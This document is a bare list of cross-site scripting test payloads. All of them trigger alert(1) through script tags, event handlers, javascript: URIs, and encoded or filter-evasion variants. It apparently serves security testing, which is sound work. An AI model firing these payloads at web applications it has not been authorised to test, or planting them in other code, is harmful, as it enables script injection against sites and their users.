# Payloads for XSS testing
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<a href="#" onclick="alert(1)">Click me</a>
<body onload=alert(1)>
<div onmouseover=alert(1)>Hover me</div>
javascript:alert(1)
" onmouseover="alert(1)
<img src="javascript:alert(1)">
<svg/onload=alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<scr<script>ipt>alert(1)</script>
%3Cscript%3Ealert(1)%3C/script%3E
&lt;script&gt;alert(1)&lt;/script&gt;
%253Cscript%253Ealert(1)%253C%252Fscript%253E
<input type="text" onfocus=alert(1) autofocus>
<style>*{xss:expression(alert(1))}</style>
<script>document.location='javascript:alert(1)'</script>
<script>document.body.innerHTML="<img src=x onerror=alert(1)>";</script>
<script>eval("alert(1)")</script>
%3cscript%3ealert(1)%3c%2fscript%3e
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==